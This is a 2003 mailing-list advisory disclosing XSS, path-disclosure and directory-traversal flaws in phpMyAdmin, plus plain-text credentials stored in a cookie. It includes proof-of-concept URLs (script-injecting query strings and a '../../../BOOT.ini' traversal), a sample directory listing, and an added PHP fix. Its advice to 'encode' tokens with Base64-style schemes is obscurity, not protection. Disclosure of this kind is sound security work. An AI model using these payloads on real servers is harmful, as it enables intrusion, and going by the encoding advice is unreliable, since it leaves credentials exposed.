phpMyAdmin XSS Vulnerabilities, Directory Traversal Attack, Information Encoding Weakness and Path Disclosures

From: Lorenzo Manuel Hernandez Garcia-Hierro (securityat_private)
Date: Wed Jun 18 2003 - 09:33:36 PDT

    phpMyAdmin XSS Vulnerabilities, Directory Traversal Attack,
    Information Encoding Weakness and Path Disclosures
    --------------------
    Product: phpMyAdmin
    Vendor: phpMyAdmin Development Team 
    Versions:
             VULNERABLE
             
             - 2.5.2 CVS ( in Development )
             - 2.5.x
             - 2.4.x
             - 2.3.x
             - 2.2.x
             - 2.1.x
             - 2.0.x
             - 1.x.x
            
             NOT VULNERABLE
            
             - ?
    Advisory: NSRG-15-7
    ---------------------
    
    Description:
    
    phpMyAdmin is a tool written in PHP intended to handle the administration
    of MySQL over the WWW. Currently it can create and drop databases,
    create/drop/alter tables, delete/edit/add fields, execute any SQL
    statement, and manage keys on fields.
    
    
    -----------------------------------------
    SECURITY HOLES FOUND and PROOFS OF CONCEPT:
    -----------------------------------------
    
    I encountered Cross Site Scripting vulnerabilities and Path Disclosures
    in some files of the phpMyAdmin installation; with these files, by sending
    a specially crafted URL you can execute commands on the client side only
    and show the local path of the phpMyAdmin installation. The failures are
    related to an input validation flaw and an improper configuration of
    php.ini and of the PHP configuration declare library
    (declare_php.lib.php) in phpMyAdmin for the error flags.
    I encountered a very dangerous directory traversal attack in the docSQL
    import system too.
    I discovered that phpMyAdmin doesn't encode the MySQL user and password;
    it saves the data in plain text without encoding!
    
    -------------------------------
    |   XSS  AND PATH DISCLOSURES |
    -------------------------------
    
    The files affected by the XSS attack (Cross Site Scripting) and Path
    Disclosure are:
    
     - sql.php / sql.php3             - Path Disclosure & XSS -
     - pdf_schema.php                 - Path Disclosure & XSS -
     - pdf_pages.php                  - Path Disclosure & XSS -
     - ldi_table.php                  - Path Disclosure & XSS -
     - mult_submits.inc.php           - Path Disclosure & XSS -
     - chk_rel.php                    - Path Disclosure -
     - db_create.php                  - Path Disclosure -
     - db_datadict.php                - Path Disclosure & XSS -
     - db_details.php                 - Path Disclosure -
     - db_details_common.php          - Path Disclosure -
     - db_details_db_info.php         - Path Disclosure -
     - db_details_export.php          - Path Disclosure -
     - db_details_structure.php       - Path Disclosure -
     - db_printview.php               - Path Disclosure & XSS -
     - db_search.php                  - Path Disclosure -
     - header_printview.inc.php       - Path Disclosure -
     - ldi_check.php                  - Path Disclosure -
     - read_dump.php                  - Path Disclosure & XSS -
     - tbl_addfield.php               - Path Disclosure -
     - tbl_alter.php                  - Path Disclosure -
     - tbl_create.php                 - Path Disclosure -
     - tbl_dump.php                   - Path Disclosure -
     - tbl_move_copy.php              - Path Disclosure -
     - tbl_printview.php              - Path Disclosure -
     - tbl_properties.inc.php         - Path Disclosure -
     - tbl_properties.php             - Path Disclosure -
     - tbl_properties_common.php      - Path Disclosure -
     - tbl_properties_export.php      - Path Disclosure -
     - tbl_properties_links.php       - Path Disclosure -
     - tbl_properties_operations.php  - Path Disclosure -
     - tbl_properties_options.php     - Path Disclosure -
     - tbl_properties_table_info.php  - Path Disclosure -
     - tbl_query_box.php              - Path Disclosure -
     - tbl_relation.php               - Path Disclosure -
     - tbl_rename.php                 - Path Disclosure -
     - tbl_replace.php                - Path Disclosure -
     - tbl_select.php                 - Path Disclosure -
    
    NOTE: The Path Disclosures occur when you access the affected file
    directly without any QUERY_STRING; a valid session is needed.
    The XSS can be executed by passing crafted query strings to the PHP
    scripts; see Samples for more info about this.
    
    FILES VULNERABLE TO PATH DISCLOSURES AND XSS THAT DON'T NEED A VALID
    SESSION:
    
     - libraries/auth/[cookie.auth.lib.php] - Path Disclosure -
     - libraries/xpath/[XPath.class.php]    - Path Disclosure -
     - libraries/[ip_allow_deny.lib.php]    - Path Disclosure -
     - libraries/[select_lang.lib.php]      - Path Disclosure -
     - libraries/sqlparser.lib.php          - Path Disclosure -
     - libraries/db_table_exists.lib.php    - Path Disclosure -
     
    
    -------------------------------------
    | DIRECTORY TRAVERSAL ATTACK &      |
    | REMOTE LOCAL FILE RETRIEVING &    |
    | REMOTE INTERNAL DIRECTORY LISTING |
    -------------------------------------
    
    I found a dangerous directory traversal attack in the file called
    db_details_importdocsql.php (file import system); I explain this failure
    in the Proof of Concept:
    
    ____Proof of Concept______
    
    You must send a crafted request to the db_details_importdocsql.php file:
    
    http://localhost/mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=[YOUR DIRECTORY TRAVERSAL ATTACK]
    
    If you want to do an internal directory listing you must make this request:
    
    http://localhost/mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../
    
    With this request you can list the internal directories of the root dir
    on a Windows installation (normally c:\).
    
    Note that you can't request files (only dirs) with
    db_details_importdocsql.php; if you attempt to get a file you get this
    message: This was not a Directory.
    
    SAMPLE RESULT OF A CGI-BIN DIRECTORY LISTED WITH THIS ATTACK:
    
    Server iamnottotallysecured.not
    
    Ignoring the file  .
    
    Ignoring the file  ..
    
    Ignoring the file  phf.cgi // ;-)
    
    Ignoring the file  dumpenv.pl
    
    Ignoring the file  test-cgi // ;-)
    
    Ignoring the file  testcgi.pl // ;-D
    
    Ignoring the file  wwwboard.pl
    
    Ignoring the file  count.cgi
    
    Ignoring the file  php.cgi // ;-D
    
    Ignoring the file  passwd.pl
    
    Ignoring the file  admin.cgi
    
    Ignoring the file  ftp.cgi
    
    Ignoring the file  formmail.pl // ;-D
    
    Ignoring the file  proxy.pl
    
    
    
    _______
    Samples:
    """""""
    Note that these paths are from my personal server in my testing lab:
    
    The target user or you must be logged in to run the attacks:
    
    http://localhost/mysql/sql.php?sql_query=">..<h1>XSS ! Oh my God!</h1>
    
    http://localhost/mysql/db_datadict.php?db=XSS
    
    http://localhost/mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../BOOT.ini
    
    http://localhost/mysql/read_dump.php?db=nonexistent&sql_query="><h1>XSS</h1>
    
    http://localhost/mysql/tbl_properties_links.php?table_info_num_rows=10&url_query="><h1>XSS
    
    ------------------
    | INFORMATION    |
    |   ENCODING     |
    |    WEAKNESS    |
    ------------------
    
    phpMyAdmin doesn't use any encoding such as BASE64/RadiX64; it only saves
    the user data (username and password too) in plain text without any
    encoding.
    
    The authentication token in the cookie is this:
    
    pma_cookie_username=[UserName]; lang=[language]-iso-8859-1; pma_cookie_password=[your password]
    
    A sample is:
    
    pma_cookie_username=god; lang=en-iso-8859-1; pma_cookie_password=doesnotexist
    
    -----------------
    | SOLUTIONS ;-p |
    -----------------
    
    - First: Set the error flags in php.ini to Off. [Path Disclosures]
    - Second: Use a partial / secure encoding for authentication tokens such
    as RadiX64 (not very secure, but an attacker may think that it is a more
    secure algorithm; obscurity ;-D).
    - Third: Review the db_details_importdocsql.php file to prevent directory
    traversal attacks and remote local directory listing.
    
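    The third fix above, and the escaping the XSS samples call for, as an added
    example that is not phpMyAdmin's own code: the docpath value is resolved with
    realpath() and accepted only when it is a directory beneath a fixed import
    directory, and everything echoed back to the client is HTML-escaped. The
    function name pma_resolve_docpath and the import directory path are assumptions.

```php
<?php
// Added example, not phpMyAdmin's own code: a guarded replacement for the
// unchecked use of $docpath in db_details_importdocsql.php. Assumption: all
// docSQL imports live under one fixed directory ($importBase).

// Returns the canonical directory for a user-supplied relative name, or null
// if it is absolute, contains NUL, is missing, is a file, or resolves outside
// $importBase (the "../../../" case from the advisory).
function pma_resolve_docpath(string $importBase, string $userPath): ?string
{
    $base = realpath($importBase);
    if ($base === false || !is_dir($base)) {
        return null;                      // misconfigured base directory
    }
    // Relative names only: reject NUL bytes, leading slashes and drive letters.
    if (strpos($userPath, "\0") !== false
        || preg_match('#^([A-Za-z]:)?[\\\\/]#', $userPath)) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($candidate === false || !is_dir($candidate)) {
        return null;                      // missing, or a file ("not a Directory")
    }
    // The canonical result must be $base itself or lie strictly beneath it.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($candidate !== $base && strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                      // traversal escaped the base directory
    }
    return $candidate;
}

$importBase = '/var/www/mysql/docsql';    // assumed import directory
$docpath    = isset($_GET['docpath']) ? (string) $_GET['docpath'] : '';
$dir        = pma_resolve_docpath($importBase, $docpath);
if ($dir === null) {
    // Generic message, escaped before being echoed, so a crafted docpath
    // (or sql_query, db, url_query) cannot inject markup into the page.
    echo 'Invalid import directory: ' . htmlspecialchars($docpath, ENT_QUOTES, 'ISO-8859-1');
    exit;
}
foreach (scandir($dir) as $entry) {
    if ($entry === '.' || $entry === '..') {
        continue;
    }
    echo htmlspecialchars($entry, ENT_QUOTES, 'ISO-8859-1') . "<br />\n";
}
```

    With display_errors set to Off in php.ini (the first fix), a rejected request produces neither a directory listing nor a local path.
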
    -----------
    | CONTACT |
    -----------
    
    Lorenzo Hernandez Garcia-Hierro
     --- Computer Security Analyzer ---
     --Nova Projects Professional Coding--
     PGP: Keyfingerprint
     B6D7 5FCC 78B4 97C1  4010 56BC 0E5F 2AB2
     ID: 0x9C38E1D7
     **********************************
     NSRGroup : http://security.novappc.com
      are you totally secured ?
     ______________________
    



    This archive was generated by hypermail 2b30 : Wed Jun 18 2003 - 12:04:31 PDT